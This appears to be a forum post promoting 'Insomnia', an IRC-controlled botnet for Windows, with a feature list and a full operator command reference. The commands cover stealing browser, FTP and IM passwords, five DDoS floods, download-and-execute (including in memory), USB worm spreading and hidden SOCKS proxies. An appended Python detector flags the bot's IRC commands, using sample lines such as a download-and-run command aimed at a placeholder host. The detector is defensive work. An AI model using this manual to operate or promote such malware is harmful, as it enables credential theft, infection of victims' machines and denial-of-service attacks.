Insomnia is coded in C# and requires the .NET 2.0 Framework to function properly. It is developed for those who want to target machines running the latest versions of Windows, specifically XP machines with the latest updates up to Vista, Windows 7, and even Windows 8. Because these later versions of Windows are bundled with the .NET Framework (3.5+), you will not need to worry about Insomnia losing functionality or low install rates.
Core Features:
- GeoIP for country detection with system locale fallback.
- SSL support for IRC connections.
- SOCKS5 server with uPnP for a higher success rate, and authentication.
- Encrypted topic commands with generator (updating).
- Registry monitor/persistence.
- Start Up.
- Bot quit messages are specific to the reason the process is ending:
  - Windows is going to sleep...
  - Windows is shutting down...
  - Windows is logging off...
- WMI query for installed AntiVirus and FireWall software (Vista/7/8).
- Update with MD5 hash check.
- Download and execute a .NET file in memory.
- Download and execute a file for X seconds before removing it.
- RusKill functionality marks files for deletion upon reboot and tries to reverse any changes that were made by other malware.
- 5 different DDoS methods to initiate distributed denial of service attacks against a wide variety of targets:
  - Apache Remote Memory Exhaustion (A.R.M.E.)
  - Slowloris
  - Layer7
  - Layer4
  - UDP
- BotKiller that is capable of removing bots such as ngrBot and Aryan that use injected threads in explorer.exe. BotKillers on HF are hardcoded to kill only specific malware; Insomnia, on the other hand, is coded to watch for and detect many different attributes that malware display, making it easily the most effective botkiller on HF.
- FTP Stealer
- IM Stealer
- PW Stealer (Chrome and Firefox)
- Color coding to improve readability.
----------------------------------
Command List
.v - Displays information about the bot including current version, location of the file, MD5 hash, and registry installation location (HKCU/HKLM).
.avinfo - Vista+. Queries WMI for the current Antivirus and Firewall programs installed on the client.
.chrome [keyword] - Outputs data from Chrome SQLite databases, works on latest Chrome too (16.x).
.firefox [keyword] - Outputs password data from Mozilla Firefox (latest).
.j #channel - Joins a channel.
.p #channel - Parts a channel.
.sort - Client will join the channels that match the GeoIP/Locale of the system (ex. #US, #RU).
.unsort - Reverses the above sort.
.permsort - Admins join #admins, users join #users.
.twitter "MSG" - Starts Twitter spread with the given message. Please make sure your message is enclosed in quotes so the bot knows everything it should send. More params/options for this coming soon.
.ftp - Steals FTP accounts from FileZilla if installed on the target machine. Support for more coming soon.
.bk - Starts the standard botkiller module. Capable of removing most common HF malware. This function now removes any version of Insomnia under v2.0.0.
.bk -i - Capable of removing bots that inject into explorer.exe on 32bit and iexplore.exe on 64bit machines.
.ruskill on/off - New global toggle for ruskill, more like a pDef/Ruskill hybrid. Activating Ruskill on download is no longer needed, just toggle this before and leave running to reverse many changes to the client system.
.rc - Tells the client to reconnect to IRC after 15 seconds have passed.
.up URL MD5 - Updates the binary with the given URL after checking it against the MD5 provided to make sure you are updating to a good file.
.dl URL - Downloads and executes the given URL.
.dl URL ENVVAR - Downloads and executes the given URL after dropping it into a specific environment variable path (ex. APPDATA, TEMP, etc). Case-insensitive.
.dl URL -t SECS - Downloads the target URL and waits for the given amount of time before removing the file, if it's still running.
.dl URL -m - Downloads the target URL into memory without dropping a file, and uses reflection to execute it. Sometimes, if the app you download exits with code -1, it can kill the host process (Insomnia) as well; however, the persistence thread should restart it. This command is only for those who have a good reason to use it.
.rm - Ends persistence thread, registry monitor, ruskill, all active DDoS threads, removes registry key, and removes itself.
.m on/off - Toggles mute (when on you won't get output from any commands).
.arme URL PORT SECS - Starts the Apache Remote Memory Exhaustion (A.R.M.E.) DDoS on the target URL.
.http URL PORT SECS - Starts the HTTP (Application Layer 7) DDoS on the target URL.
.tcp URL PORT SECS - Starts the TCP (Transport Layer 4) DDoS on the target URL.
.udp URL PORT SECS - Starts the UDP packet flood on the target URL.
.slow URL PORT SECS - Starts the Slowloris flood on the target URL.
.stop - Aborts any active DDoS threads.
.read URL - Reads encrypted topic commands from an external URL.
.socks - Starts the SOCKS5 server. If you repeat this command on systems that already have a SOCKS server running, it will set a new random password for those connections and output it.
.socks user pass - Sets a custom user/pass for already active/new SOCKS servers.
.usb on/off - Toggles the USB LNK automatic spreader. This will spread to all drives that are currently mounted, as well as monitor and spread to all new drives that are plugged in.
.color on/off - Toggles IRC color outputs.
.visit URL -h - Visits the specified URL without showing the browser.
.visit URL - Visits the specified URL in the default browser.
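The command list above is exactly what a network defender can match on, since the bot is driven over plaintext IRC channel messages and topics and announces itself with reason-specific quit strings. The following is an added detection example, not part of the original post and not Insomnia's own code: it parses IRC lines and flags anything matching the command syntax or quit messages listed here. The argument patterns are reconstructed from the list and are an assumption; the sample lines are constructed, not captured.

```python
import re
from typing import Dict, List, Optional

# Command grammar reconstructed from the command list above (an assumption: the real
# bot's argument syntax may differ). Sample traffic below is constructed, not captured.
_FLOOD = r"\s+\S+\s+\d{1,5}\s+\d+"          # URL PORT SECS (the five DDoS commands)
_TOGGLE = r"\s+(?:on|off)"
COMMAND_ARGS: Dict[str, str] = {
    "v": "", "avinfo": "", "sort": "", "unsort": "", "permsort": "", "ftp": "",
    "rc": "", "rm": "", "stop": "", "socks": r"(?:\s+\S+\s+\S+)?",
    "chrome": r"(?:\s+\S+)?", "firefox": r"(?:\s+\S+)?", "read": r"\s+\S+",
    "j": r"\s+#\S+", "p": r"\s+#\S+", "twitter": r'\s+"[^"]*"', "bk": r"(?:\s+-i)?",
    "ruskill": _TOGGLE, "m": _TOGGLE, "usb": _TOGGLE, "color": _TOGGLE,
    "up": r"\s+\S+\s+[0-9a-fA-F]{32}", "dl": r"\s+\S+(?:\s+(?:-t\s+\d+|-m|\w+))?",
    "visit": r"\s+\S+(?:\s+-h)?", "arme": _FLOOD, "http": _FLOOD, "tcp": _FLOOD,
    "udp": _FLOOD, "slow": _FLOOD,
}
HIGH_IMPACT = {"dl", "up", "arme", "http", "tcp", "udp", "slow", "usb", "rm"}
QUIT_STRINGS = ("Windows is going to sleep...", "Windows is shutting down...",
                "Windows is logging off...")
# :nick!user@host VERB [target] :trailing text
_IRC_LINE = re.compile(r"^:(?P<nick>[^!\s]+)\S*\s+(?P<verb>[A-Z]+)"
                       r"(?:\s+(?P<target>[^:\s]\S*))?\s+:(?P<text>.*)$")

def classify_irc_line(line: str) -> Optional[Dict[str, str]]:
    """Return an alert for a line that looks like Insomnia C&C traffic, else None."""
    m = _IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    nick, verb, target, text = m.group("nick", "verb", "target", "text")
    # The reason-specific quit messages identify the quitting nick as an infected host.
    if verb == "QUIT" and text in QUIT_STRINGS:
        return {"kind": "bot_quit", "nick": nick, "text": text, "severity": "medium"}
    if verb not in ("PRIVMSG", "TOPIC"):   # commands arrive as channel text or topics
        return None
    for cmd, args in COMMAND_ARGS.items():
        if re.fullmatch(r"\." + cmd + args, text):   # the whole message must be a command
            return {"kind": "c2_command", "nick": nick, "channel": target or "", "command": cmd,
                    "text": text, "severity": "high" if cmd in HIGH_IMPACT else "low"}
    return None

def scan(lines: List[str]) -> List[Dict[str, str]]:
    return [a for a in map(classify_irc_line, lines) if a]

SAMPLE_LINES = [  # constructed sample traffic using documentation address ranges
    ":herder!h@192.0.2.10 PRIVMSG #US :.dl http://example.invalid/x.exe -m",
    ":herder!h@192.0.2.10 TOPIC #main :.ruskill on",
    ":bot123!b@192.0.2.55 QUIT :Windows is logging off...",
    ":alice!a@192.0.2.7 PRIVMSG #chat :hey .v is nice",
    ":herder!h@192.0.2.10 PRIVMSG #US :.udp 203.0.113.5 80 300",
]
```

Run `scan(SAMPLE_LINES)` to get the four alerts; the chat line mentioning `.v` mid-sentence is correctly ignored because a command must be the entire message.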
credit to Ax0nes